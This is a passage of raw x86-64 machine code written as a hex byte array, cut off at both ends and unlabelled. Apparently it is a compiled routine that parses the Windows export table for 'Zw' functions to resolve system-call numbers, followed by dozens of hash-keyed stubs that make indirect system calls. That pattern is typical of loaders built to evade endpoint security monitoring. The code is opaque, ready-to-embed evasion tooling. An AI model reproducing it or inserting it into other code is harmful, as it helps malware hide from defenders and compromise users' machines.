B,0x40,0x1C,0x89,0xC2,0x48,0x8B,0x45,0xF0,0x48,0x01,0xD0,0x48,0x89,0x45,0x98,0x48,0x8B,0x45,0xF8,0x8B,0x40,0x20,0x89,0xC2,0x48,0x8B,0x45,0xF0,0x48,0x01,0xD0,0x48,0x89,0x45,0x90,0x48,0x8B,0x45,0xF8,0x8B,0x40,0x24,0x89,0xC2,0x48,0x8B,0x45,0xF0,0x48,0x01,0xD0,0x48,0x89,0x45,0x88,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x48,0x8D,0x05,0x1C,0xA4,0x00,0x00,0x48,0x89,0x45,0x80,0x8B,0x45,0xE4,0x83,0xE8,0x01,0x89,0xC0,0x48,0x8D,0x14,0x85,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x90,0x48,0x01,0xD0,0x8B,0x00,0x89,0xC2,0x48,0x8B,0x45,0xF0,0x48,0x01,0xD0,0x48,0x89,0x85,0x78,0xFF,0xFF,0xFF,0x48,0x8B,0x85,0x78,0xFF,0xFF,0xFF,0x0F,0xB7,0x00,0x66,0x3D,0x5A,0x77,0x75,0x6E,0x8B,0x45,0xE0,0x48,0xC1,0xE0,0x04,0x48,0x89,0xC2,0x48,0x8B,0x45,0x80,0x48,0x8D,0x1C,0x02,0x48,0x8B,0x85,0x78,0xFF,0xFF,0xFF,0x48,0x89,0xC1,0xE8,0xB2,0xFD,0xFF,0xFF,0x89,0x03,0x8B,0x45,0xE4,0x83,0xE8,0x01,0x89,0xC0,0x48,0x8D,0x14,0x00,0x48,0x8B,0x45,0x88,0x48,0x01,0xD0,0x0F,0xB7,0x00,0x0F,0xB7,0xC0,0x48,0x8D,0x14,0x85,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x98,0x48,0x01,0xD0,0x8B,0x55,0xE0,0x48,0x89,0xD1,0x48,0xC1,0xE1,0x04,0x48,0x8B,0x55,0x80,0x48,0x01,0xCA,0x8B,0x00,0x89,0x42,0x04,0x83,0x45,0xE0,0x01,0x81,0x7D,0xE0,0x26,0x02,0x00,0x00,0x74,0x10,0x83,0x6D,0xE4,0x01,0x83,0x7D,0xE4,0x00,0x0F,0x85,0x4B,0xFF,0xFF,0xFF,0xEB,0x01,0x90,0x8B,0x45,0xE0,0x89,0x05,0x4F,0xA3,0x00,0x00,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xE9,0x3C,0x01,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0xE9,0x17,0x01,0x00,0x00,0x8B,0x45,0xDC,0x48,0xC1,0xE0,0x04,0x48,0x89,0xC2,0x48,0x8B,0x45,0x80,0x48,0x01,0xD0,0x8B,0x40,0x04,0x8B,0x55,0xDC,0x83,0xC2,0x01,0x89,0xD2,0x48,0x89,0xD1,0x48,0xC1,0xE1,0x04,0x48,0x8B,0x55,0x80,0x48,0x01,0xCA,0x8B,0x52,0x04,0x39,0xC2,0x0F,0x83,0xDE,0x00,0x00,0x00,0x48,0xC7,0x85,0x40,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x48,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0x8B,0x45,0xDC,0x48,0xC1,0xE0,0x04,0x48,0x89,0xC2,0x48,0x8B,0x45,0x80,0x48,0x01,0xD0,0x8B,0x00,0x89,0x85,0x40,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x48,0xC1,0xE0,0x04,0x48,0x89,0xC2,0x48,0x8B,0x45,0x80,0x48,0x01,0xD0,0x8B,0x40,0x04,0x89,0x85,0x44,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x83,0xC0,0x01,0x89,0xC0,0x48,0xC1,0xE0,0x04,0x48,0x89,0xC2,0x48,0x8B,0x45,0x80,0x48,0x01,0xD0,0x8B,0x55,0xDC,0x48,0x89,0xD1,0x48,0xC1,0xE1,0x04,0x48,0x8B,0x55,0x80,0x48,0x01,0xCA,0x8B,0x00,0x89,0x02,0x8B,0x45,0xDC,0x83,0xC0,0x01,0x89,0xC0,0x48,0xC1,0xE0,0x04,0x48,0x89,0xC2,0x48,0x8B,0x45,0x80,0x48,0x01,0xD0,0x8B,0x55,0xDC,0x48,0x89,0xD1,0x48,0xC1,0xE1,0x04,0x48,0x8B,0x55,0x80,0x48,0x01,0xCA,0x8B,0x40,0x04,0x89,0x42,0x04,0x8B,0x45,0xDC,0x83,0xC0,0x01,0x89,0xC0,0x48,0xC1,0xE0,0x04,0x48,0x89,0xC2,0x48,0x8B,0x45,0x80,0x48,0x01,0xC2,0x8B,0x85,0x40,0xFF,0xFF,0xFF,0x89,0x02,0x8B,0x45,0xDC,0x83,0xC0,0x01,0x89,0xC0,0x48,0xC1,0xE0,0x04,0x48,0x89,0xC2,0x48,0x8B,0x45,0x80,0x48,0x01,0xC2,0x8B,0x85,0x44,0xFF,0xFF,0xFF,0x89,0x42,0x04,0x83,0x45,0xDC,0x01,0x8B,0x05,0x1A,0xA2,0x00,0x00,0x2B,0x45,0xE0,0x83,0xE8,0x01,0x39,0x45,0xDC,0x0F,0x82,0xD4,0xFE,0xFF,0xFF,0x83,0x45,0xE0,0x01,0x8B,0x05,0x01,0xA2,0x00,0x00,0x83,0xE8,0x01,0x39,0x45,0xE0,0x0F,0x82,0xB2,0xFE,0xFF,0xFF,0x48,0x8B,0x45,0x80,0x48,0x83,0xC0,0x10,0x8B,0x50,0x04,0x48,0x8B,0x45,0x80,0x8B,0x40,0x04,0x29,0xC2,0x89,0x95,0x74,0xFF,0xFF,0xFF,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xEB,0x53,0x8B,0x45,0xE0,0x48,0xC1,0xE0,0x04,0x48,0x89,0xC2,0x48,0x8B,0x45,0x80,0x48,0x01,0xD0,0x8B,0x40,0x04,0x89,0xC2,0x48,0x8B,0x45,0xF0,0x48,0x01,0xD0,0x48,0x89,0x85,0x68,0xFF,0xFF,0xFF,0x8B,0x45,0xE0,0x48,0xC1,0xE0,0x04,0x48,0x89,0xC2,0x48,0x8B,0x45,0x80,0x48,0x8D,0x1C,0x02,0x8B,0x95,0x74,0xFF,0xFF,0xFF,0x48,0x8B,0x85,0x68,0xFF,0xFF,0xFF,0x48,0x89,0xC1,0xE8,0x48,0xFA,0xFF,0xFF,0x48,0x89,0x43,0x08,0x83,0x45,0xE0,0x01,0x8B,0x05,0x79,0xA1,0x00,0x00,0x83,0xE8,0x01,0x39,0x45,0xE0,0x72,0x9F,0xB8,0x01,0x00,0x00,0x00,0x48,0x81,0xC4,0xE8,0x00,0x00,0x00,0x5B,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x89,0x4D,0x10,0xE8,0xAC,0xFB,0xFF,0xFF,0x85,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x3B,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xEB,0x22,0x8B,0x45,0xFC,0x48,0xC1,0xE0,0x04,0x48,0x89,0xC2,0x48,0x8D,0x05,0x35,0xA1,0x00,0x00,0x8B,0x04,0x02,0x39,0x45,0x10,0x75,0x05,0x8B,0x45,0xFC,0xEB,0x14,0x83,0x45,0xFC,0x01,0x8B,0x05,0x16,0xA1,0x00,0x00,0x39,0x45,0xFC,0x72,0xD3,0xB8,0x00,0x00,0x00,0x00,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x89,0x4D,0x10,0xE8,0x50,0xFB,0xFF,0xFF,0x85,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x4D,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xEB,0x34,0x8B,0x45,0xFC,0x48,0xC1,0xE0,0x04,0x48,0x89,0xC2,0x48,0x8D,0x05,0xD9,0xA0,0x00,0x00,0x8B,0x04,0x02,0x39,0x45,0x10,0x75,0x17,0x8B,0x45,0xFC,0x48,0xC1,0xE0,0x04,0x48,0x89,0xC2,0x48,0x8D,0x05,0xC8,0xA0,0x00,0x00,0x48,0x8B,0x04,0x02,0xEB,0x14,0x83,0x45,0xFC,0x01,0x8B,0x05,0xA8,0xA0,0x00,0x00,0x39,0x45,0xFC,0x72,0xC1,0xB8,0x00,0x00,0x00,0x00,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x48,0xC7,0xC0,0x00,0x00,0x00,0x00,0xC3,0x90,0x0F,0x0B,0x48,0x8B,0x04,0x24,0xC3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0x0F,0x2A,0x9B,0xCD,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0x57,0xFF,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xEC,0xFE,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0x2F,0x1A,0xBF,0xFF,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0xFD,0xFE,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x92,0xFE,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x67,0x75,0x8B,0x11,0x51,0x48,0x83,0xEC,0x28,0xE8,0xA6,0xFE,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x3B,0xFE,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x3F,0xD3,0x52,0x22,0x51,0x48,0x83,0xEC,0x28,0xE8,0x4F,0xFE,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xE4,0xFD,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0xA2,0x15,0xA9,0x8F,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0xF5,0xFD,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x8A,0xFD,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0x20,0xBC,0xBC,0xBD,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0x9B,0xFD,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x30,0xFD,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x80,0xE9,0x93,0x03,0x51,0x48,0x83,0xEC,0x28,0xE8,0x44,0xFD,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xD9,0xFC,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x32,0x1B,0xAB,0x17,0x51,0x48,0x83,0xEC,0x28,0xE8,0xED,0xFC,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x82,0xFC,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x1B,0x03,0x95,0x05,0x51,0x48,0x83,0xEC,0x28,0xE8,0x96,0xFC,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x2B,0xFC,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x05,0x2F,0x93,0x01,0x51,0x48,0x83,0xEC,0x28,0xE8,0x3F,0xFC,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xD4,0xFB,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0xB6,0x8E,0x01,0x96,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0xE5,0xFB,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x7A,0xFB,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x1A,0x2A,0xB2,0x24,0x51,0x48,0x83,0xEC,0x28,0xE8,0x8E,0xFB,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x23,0xFB,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0xE3,0xE2,0x98,0x11,0x51,0x48,0x83,0xEC,0x28,0xE8,0x37,0xFB,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xCC,0xFA,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x8F,0x2C,0x5B,0x4A,0x51,0x48,0x83,0xEC,0x28,0xE8,0xE0,0xFA,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x75,0xFA,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0x13,0xA4,0xBF,0x9C,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0x86,0xFA,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x1B,0xFA,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x4F,0xF6,0x23,0x0E,0x51,0x48,0x83,0xEC,0x28,0xE8,0x2F,0xFA,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xC4,0xF9,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0xE3,0x76,0x63,0x42,0x51,0x48,0x83,0xEC,0x28,0xE8,0xD8,0xF9,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x6D,0xF9,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x1A,0x6A,0xB2,0x64,0x51,0x48,0x83,0xEC,0x28,0xE8,0x81,0xF9,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x16,0xF9,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0xA0,0x64,0x2E,0x65,0x51,0x48,0x83,0xEC,0x28,0xE8,0x2A,0xF9,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xBF,0xF8,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x0C,0x32,0x9F,0x1D,0x51,0x48,0x83,0xEC,0x28,0xE8,0xD3,0xF8,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x68,0xF8,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x36,0x71,0x91,0x27,0x51,0x48,0x83,0xEC,0x28,0xE8,0x7C,0xF8,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x11,0xF8,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x84,0x83,0x9C,0x09,0x51,0x48,0x83,0xEC,0x28,0xE8,0x25,0xF8,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xBA,0xF7,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xC7,0xC1,0x87,0x5F,0xBE,0x1A,0x51,0x48,0x83,0xEC,0x28,0xE8,0xCE,0xF7,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x63,0xF7,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0xEA,0x62,0xBD,0xBC,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0x74,0xF7,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x09,0xF7,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0x6D,0xBA,0xD1,0x8A,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0x1A,0xF7,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xAF,0xF6,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0x0F,0x98,0x97,0x8C,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0xC0,0xF6,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0x55,0xF6,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0xA7,0x8C,0x3A,0xA6,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0x66,0xF6,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0xE8,0xFB,0xF5,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x41,0x5B,0x48,0x8B,0x4C,0x24,0x08,0x48,0x8B,0x54,0x24,0x10,0x4C,0x8B,0x44,0x24,0x18,0x4C,0x8B,0x4C,0x24,0x20,0x49,0x89,0xCA,0x41,0xFF,0xE3,0x90,0x0F,0x0B,0x48,0x89,0x4C,0x24,0x08,0x48,0x89,0x54,0x24,0x10,0x4C,0x89,0x44,0x24,0x18,0x4C,0x89,0x4C,0x24,0x20,0x48,0xB9,0xF9,0x12,0x69,0xF0,0x00,0x00,0x00,0x00,0x51,0x48,0x83,0xEC,0x28,0xE8,0x0C,0xF6,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x59,0x50,0x48,0x83,0xEC,0x28,0